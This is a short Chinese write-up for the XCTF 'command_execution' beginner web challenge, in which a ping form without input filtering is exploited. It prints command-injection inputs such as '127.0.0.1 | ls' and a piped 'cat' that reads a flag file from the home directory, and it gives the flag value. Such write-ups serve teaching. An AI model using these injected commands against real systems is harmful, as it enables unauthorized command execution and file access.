xctf攻防世界—Web新手練習區 writeup
阿新 • • 發佈:2020-12-28
場景:command_execution
難度係數:2.0
題目來源: Cyberpeace-n3k0
題目描述:小寧寫了個ping功能,但沒有寫waf,X老師告訴她這是非常危險的,你知道為什麼嗎。
題目場景:http://220.249.52.134:56092
問題描述:
小寧寫了個ping功能,但沒有寫waf,X老師告訴她這是非常危險的,你知道為什麼嗎。
解決方案:
先嚐試輸入本地IP:
ping -c 3 127.0.0.1
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time =0.088 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.052 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.038 ms
--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1998ms
rtt min/avg/max/mdev = 0.038/0.059/0.088/0.022 ms
然後輸入命令:ping -c 3 127.0.0.1 | ls:
ping -c 3 127.0.0.1 | ls
index.php
在home檔案目錄下發現:flag.txt:
ping -c 3 127.0.0.1 | ls ../../../home/
flag.txt
嘗試開啟flag.txt,輸入控制檯命令:127.0.0.1 | cat …/…/…/home/flag.txt,
得到 flag:cyberpeace{9a27a9c1e0ac69bd09ddf1d1557ea2aa}
提示:每個人的flag都不同